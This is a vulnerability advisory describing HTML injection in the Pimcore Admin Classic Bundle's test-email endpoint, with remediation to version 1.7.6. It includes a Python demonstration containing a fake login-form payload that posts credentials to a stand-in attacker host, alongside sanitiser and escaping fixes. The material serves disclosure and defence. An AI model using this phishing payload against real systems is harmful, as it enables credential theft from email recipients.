Pimcore Admin Classic Bundle HTML Injection Vulnerability in Email Sending Functionality

Vulnerability

An HTML injection vulnerability has been identified in the Pimcore Admin Classic Bundle, affecting versions up to and including 1.7.5. The issue lies in the email sending functionality of the Backend UI: the '/admin/email/send-test-email' endpoint, reached via POST, takes a 'content' parameter whose value is placed into the outgoing email without adequate sanitisation. Script content is filtered, so the attacker cannot run JavaScript in the message directly, but arbitrary markup (forms, links, images, restyled blocks) survives the filter and is rendered by the recipient's mail client. That is enough to alter the visible content of the email and to lure the recipient to an attacker-controlled page where credentials or session cookies can be harvested.

Impact

Exploitation of this vulnerability could facilitate phishing: a user with access to the admin interface can inject deceptive HTML, such as a fake login form posting to an external site, into emails sent through it, and the mail arrives from the organisation's own Pimcore instance, which lends the forged content credibility.

Reproduction

To reproduce this vulnerability, a user with access to the email sending feature of the Pimcore Admin Classic Bundle Backend UI composes a test email and places an HTML payload in the content form, which is submitted as the 'content' parameter of a POST request to '/admin/email/send-test-email'. Once the email is sent, the injected markup is rendered in the recipient's mail client rather than shown as text, so the email's content can be manipulated and the recipient can be directed to a page that captures credentials or session cookies.
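The following Python example is added here to illustrate the mechanism described above and is not code from Pimcore or from the advisory. It models a filter that only strips script (a stand-in for the behaviour the advisory describes, not Pimcore's actual implementation), shows that a constructed fake login form passes through it untouched, and contrasts it with an allowlist sanitiser and with plain escaping. The request builder only fills the 'content' parameter documented above; any other form fields the endpoint expects, and the attacker.example host in the payload, are assumptions for the demonstration, and nothing is sent over the network.

```python
import html
import re
from html.parser import HTMLParser
from urllib.parse import urlencode

# Constructed payload: a fake login form plus two script vectors. The form
# needs no JavaScript to be harmful; the script and onerror parts are there
# only to show what a script-only filter catches. attacker.example is assumed.
FAKE_LOGIN_FORM = (
    '<p>Your session has expired.</p>'
    '<form action="https://attacker.example/collect" method="post">'
    '<input name="username"><input name="password" type="password">'
    '<button>Sign in</button></form>'
    '<script>alert(1)</script>'
    '<img src="x" onerror="alert(1)">'
)

ENDPOINT = "/admin/email/send-test-email"


def build_test_email_request(content):
    """Return (path, urlencoded body) for the documented endpoint.

    Only the 'content' parameter from the advisory is included; other fields
    the form may require are not known from the advisory and are left out.
    """
    return ENDPOINT, urlencode({"content": content})


# --- Model of a script-only filter (illustrative, not Pimcore's code) -------
_SCRIPT_RE = re.compile(r"<script\b.*?</script>", re.I | re.S)
_EVENT_ATTR_RE = re.compile(r"\s+on\w+\s*=\s*(\"[^\"]*\"|'[^']*'|\S+)", re.I)
_JS_URL_RE = re.compile(r"javascript:", re.I)


def naive_strip_javascript(content):
    """Remove <script> blocks, on* handlers and javascript: URLs, nothing else."""
    content = _SCRIPT_RE.sub("", content)
    content = _EVENT_ATTR_RE.sub("", content)
    return _JS_URL_RE.sub("", content)


# --- Hardened alternative 1: allowlist sanitiser ---------------------------
ALLOWED_TAGS = {"p", "br", "b", "i", "strong", "em", "ul", "ol", "li"}


class AllowlistSanitizer(HTMLParser):
    """Keep only harmless formatting tags, drop every attribute, escape text."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self._skip = 0  # depth inside <script>/<style>, whose text is dropped

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "style"):
            self._skip += 1
        elif tag in ALLOWED_TAGS:
            self.out.append(f"<{tag}>")  # attributes are never copied

    def handle_endtag(self, tag):
        if tag in ("script", "style"):
            self._skip = max(0, self._skip - 1)
        elif tag in ALLOWED_TAGS and tag != "br":
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self._skip:
            self.out.append(html.escape(data, quote=True))


def sanitize_allowlist(content):
    parser = AllowlistSanitizer()
    parser.feed(content)
    parser.close()
    return "".join(parser.out)


# --- Hardened alternative 2: treat the field as plain text -----------------
def escape_plain_text(content):
    """Correct fix when the test-email body is not meant to carry markup."""
    return html.escape(content, quote=True)


def contains_phishing_markup(rendered):
    """Detection helper: does any form/link/input/button survive?"""
    return re.search(r"<(form|a|input|button)\b", rendered, re.I) is not None


if __name__ == "__main__":
    path, body = build_test_email_request(FAKE_LOGIN_FORM)
    print("POST", path, "with", len(body), "bytes of form data")
    for name, fn in (("naive", naive_strip_javascript),
                     ("allowlist", sanitize_allowlist),
                     ("escape", escape_plain_text)):
        out = fn(FAKE_LOGIN_FORM)
        print(f"{name:9} phishing markup survives: {contains_phishing_markup(out)}")
```

The script-only filter removes both script vectors yet leaves the form, its action URL and the inputs intact, which is exactly the gap the advisory describes. If the test-email body is meant to be plain text, `escape_plain_text` is the simplest correct fix; the allowlist sanitiser is for the case where some formatting must be preserved, and it drops attributes wholesale so that no action, href or src can point at an attacker-controlled host.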

Remediation

Update the Pimcore Admin Classic Bundle to version 1.7.6 or later, where this vulnerability has been fixed. Until the upgrade is applied, treat access to the Backend UI email feature as a privilege and review outgoing test emails for injected markup.

Added: Jun 9, 2025, 7:46 PM
Updated: Jun 9, 2025, 7:46 PM

Vulnerability Rating

Custom Algorithm
spread: 3.4
impact: 3.1
exploitability: 5.9
remediation: 7.7
relevance: 0.0
threat: 6.4
urgency: 2.9
incentive: 1.7

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.